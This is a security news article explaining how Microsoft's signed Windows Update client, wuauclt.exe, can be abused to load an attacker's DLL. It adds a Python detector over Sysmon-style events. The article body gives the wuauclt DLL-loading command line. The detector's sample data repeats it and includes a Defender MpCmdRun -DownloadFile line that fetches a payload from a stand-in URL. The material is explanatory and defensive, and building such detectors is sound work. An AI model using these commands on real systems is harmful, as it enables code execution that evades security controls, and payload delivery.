Windows Update: can be abused to run malicious programs

LoLBins (living-off-the-land binaries) are Microsoft-signed executables, either preinstalled or downloadable, that attackers can abuse to download, install or run malicious code while avoiding detection, because the binary doing the work is trusted.

They are also used by attackers to bypass Windows User Account Control (UAC) or Windows Defender Application Control (WDAC) and to keep their foothold on systems they have already compromised.

The WSUS / Windows Update client (wuauclt.exe) is a utility located in %windir%\system32\ that gives users some control over the Windows Update Agent from the command line.

It allows you to check for new updates and install them without going through the Windows user interface, by triggering them from a command prompt window instead.

According to Microsoft, the /ResetAuthorization option starts a manual update check, either against the locally configured WSUS server or through the Microsoft Update service.

However, MDSec researcher David Middlehurst discovered that wuauclt can also be used by attackers to execute malicious code on Windows 10 systems by loading it from a specially crafted DLL, using the following command-line options:

wuauclt.exe /UpdateDeploymentProvider [path_to_dll] /RunHandlerComServer

As shown above, [path_to_dll] is the absolute path to the attacker's specially crafted DLL, whose code is executed by the signed wuauclt.exe process.

This technique is categorized by MITRE ATT&CK as Signed Binary Proxy Execution (the same technique family as Rundll32 abuse), and it allows intruders to bypass antivirus, application control and digital certificate validation defenses.

In this case it does so by running malicious code from a DLL that was loaded by a Microsoft-signed binary, the Windows Update client (wuauclt).

After discovering that wuauclt can also be used as a LoLBin, Middlehurst also found a sample that used it in the wild.

Microsoft recently updated its Microsoft Defender antivirus on Windows 10 by quietly adding a (potentially abusable) way to download files to Windows devices.

Microsoft later removed this feature from MpCmdRun.exe (the Microsoft Antimalware Service Command Line Utility).
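As an added detection example (not code from this article, from MDSec or from Microsoft), the following Python parses constructed Sysmon-style process-creation events and flags the two command-line patterns described on this page: wuauclt.exe launched with /UpdateDeploymentProvider and /RunHandlerComServer, and MpCmdRun.exe launched with -DownloadFile. The event shape, the DLL paths and the URL are assumptions for the sample; the /ResetAuthorization /detectnow line is the legitimate usage the article describes and serves as the benign control.

```python
import shlex
from typing import Optional

# Constructed process-creation events in the shape of Sysmon Event ID 1
# (Image + CommandLine). These are not real telemetry.
SAMPLE_EVENTS = [
    # 1. Legitimate manual update check described in the article.
    {"Image": r"C:\Windows\System32\wuauclt.exe",
     "CommandLine": "wuauclt.exe /ResetAuthorization /detectnow"},
    # 2. The MDSec command line: an arbitrary DLL loaded by a signed binary.
    {"Image": r"C:\Windows\System32\wuauclt.exe",
     "CommandLine": r'wuauclt.exe /UpdateDeploymentProvider "C:\Users\Public\update.dll" /RunHandlerComServer'},
    # 3. Same technique, mixed case and no quotes (Windows switches are case-insensitive).
    {"Image": r"C:\Windows\System32\wuauclt.exe",
     "CommandLine": r"WUAUCLT.EXE /updatedeploymentprovider C:\ProgramData\x.dll /runhandlercomserver"},
    # 4. Ordinary Defender quick scan, benign.
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    # 5. The download feature the article says Microsoft later removed (URL is made up).
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -DownloadFile -url http://example.invalid/payload.bin -path C:\Users\Public\payload.bin"},
]


def split_windows_cmdline(cmd: str) -> list:
    """Split a Windows command line on whitespace while honouring double quotes.
    posix=False keeps backslashes literal (they are path separators, not escapes)
    and keeps the quotes on the token, so they are stripped afterwards."""
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]


def arg_after(tokens: list, switch: str) -> Optional[str]:
    """Return the token that follows `switch` (compared case-insensitively), or None."""
    lowered = [t.lower() for t in tokens]
    try:
        i = lowered.index(switch.lower())
    except ValueError:
        return None
    return tokens[i + 1] if i + 1 < len(tokens) else None


def classify(event: dict) -> Optional[dict]:
    """Return a hit for one of the two LoLBin patterns, or None for benign use.
    The match is on the image name plus the switches, not on the image alone,
    because both binaries run legitimately all the time."""
    image = event["Image"].lower()
    tokens = split_windows_cmdline(event["CommandLine"])
    switches = {t.lower() for t in tokens[1:]}

    if image.endswith("\\wuauclt.exe") and \
            {"/updatedeploymentprovider", "/runhandlercomserver"} <= switches:
        return {"rule": "wuauclt_dll_proxy_exec",
                "artifact": arg_after(tokens, "/UpdateDeploymentProvider")}

    if image.endswith("\\mpcmdrun.exe") and "-downloadfile" in switches:
        return {"rule": "mpcmdrun_downloadfile",
                "artifact": arg_after(tokens, "-url")}

    return None


def detect_all(events: list) -> list:
    """Run classify() over a list of events; each hit carries its event index."""
    hits = []
    for idx, ev in enumerate(events):
        hit = classify(ev)
        if hit:
            hit["index"] = idx
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in detect_all(SAMPLE_EVENTS):
        print(hit)
```

Because wuauclt.exe is started routinely by the Windows Update service and by management agents (the /ResetAuthorization /detectnow form above is expected on WSUS-managed hosts), the rule keys on the switch pair rather than on the process name; a broader variant could alert on any /UpdateDeploymentProvider argument pointing outside System32. The MpCmdRun rule is only relevant on Defender builds that still carry -DownloadFile, which the article says Microsoft removed.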


Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.
